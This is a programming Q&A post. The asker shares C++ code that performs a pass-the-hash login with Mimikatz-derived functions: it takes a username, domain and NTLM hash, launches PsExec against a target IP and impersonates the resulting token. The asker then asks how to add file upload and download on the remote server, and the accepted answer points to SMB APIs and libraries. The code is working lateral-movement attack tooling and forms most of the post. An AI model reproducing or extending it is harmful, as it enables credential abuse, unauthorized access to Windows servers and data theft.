# Connect to Windows Server File System with SMB

Tags: c++, c, windows, smb, cifs

I have written a program with C++ that can spawn an authenticate cmd.exe process in a workgroup. In further, I can run the psexec.exe program with that authenticated token to connect the server machine.

```
    printf("\n\t");
    WarningMessage("%s\n", "Fill following information:");

    printf("\n\t\tUsername: ");
    wscanf(L"%ls", username);

    printf("\t\tDomain: ");
    wscanf(L"%ls", domain);

    printf("\t\tNTLM Hash: ");
    wscanf(L"%ls", hash_ntlm);

    printf("\t\tDestination IP: ");
    wscanf(L"%ls", ip_destination);

    wcscpy(process_name, TEXT("PSExec.exe \\\\"));
    wcscat(process_name, ip_destination);
    wcscat(process_name, TEXT(" cmd.exe"));

    if (kull_m_string_stringToHex(hash_ntlm, ntlm, LM_NTLM_HASH_LENGTH))
    {
        data.NtlmHash = ntlm;
    }
    else
    {
        printf("\t");
        ErrorMessage("%s\n", "ntlm hash/rc4 key length must be 32 (16 bytes)");
    }

    printf("\n\t");
    NormalMessage("%s\n", "PTH login to the Active Directory process has been started:");
    if (data.NtlmHash)
    {
        if (LoginWithActiveDirectory(KULL_M_PROCESS_CREATE_LOGON, process_name, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, username, domain, L"", &process_infos, FALSE))
        {
            printf("\n");

            PrintColorful(2, "\t\tPID: ");
            printf("%d\n", process_infos.dwProcessId);

            PrintColorful(2, "\t\tTID: ");
            printf("%d\n\n", process_infos.dwThreadId);

            if (OpenProcessToken(process_infos.hProcess, TOKEN_READ | (is_impersonate ? TOKEN_DUPLICATE : 0), &handle_token))
            {
                if (GetTokenInformation(handle_token, TokenStatistics, &token_status, sizeof(token_status), &needed_size))
                {
                    kuhl_m_sekurlsa_pth_luid(&data);
                    if (is_impersonate)
                    {
                        if (DuplicateTokenEx(handle_token, TOKEN_QUERY | TOKEN_IMPERSONATE, NULL, SecurityDelegation, TokenImpersonation, &handle_new_token))
                        {
                            if (SetThreadToken(NULL, handle_new_token))
                            {
                                NormalMessage("%s\n", "Token Impersonated.");
                            }
                            else
                            {
                                ErrorMessage("%s\n", "SetThreadToken failed.");
                                CloseHandle(handle_new_token);
                            }
                        }
                        else
                        {
                            ErrorMessage("%s\n", "DuplicateTokenEx failed.");
                            NtTerminateProcess(process_infos.hProcess, STATUS_SUCCESS);
                        }
                    }
                    else
                    {
                        NtResumeProcess(process_infos.hProcess);
                    }
                }
                else
                {
                    ErrorMessage("%s\n", "GetTokenInformation failed.");
                }
            }
            else
            {
                ErrorMessage("%s\n", "OpenProcessToken failed.");
            }
            CloseHandle(process_infos.hThread);
            CloseHandle(process_infos.hProcess);
            printf("\n");
        }
        else
        {
            printf("\n\t");
            ErrorMessage("%s\n", "PTH login to the Active Directory process has failed.");
        }
    }
    else
    {
        printf("\t");
        ErrorMessage("%s\n", "Missing some arguments for authentication.");
    }
}
```

However, When psexec.exe executed it gives me just a command prompt environment for the server in which I can execute the command and see the result back but I wanted to have ability to download/upload files from the server machine.

However, unfortunately, I don't know how can I write a program that lets me download or upload files onto the server machine even after authentication.

I have searched and found out I should use SMB/CIFS but I couldn't find even a brief introduction which explain what should I do to implement such a program. Someone could share information about this problem?

Answer (score 0, accepted):

It depends on the OS you are using to run your program.

Windows:
There are [several Win API](https://learn.microsoft.com/en-us/windows/win32/wes/accessing-remote-computers) that you can use to connect to the requested remote server.

Linux:
You can use Samba - see [this](https://mail.gnome.org/archives/gtkmm-list/2014-September/msg00029.html) for using Samba in C++
* Just note that Samba is a GPL3 product.

Any OS:
There is a commercial licence product called [YNQ](https://www.visualitynq.com/products/ynq) that you can look into, its a C base product, so I don't think that it will be hard to port to your program.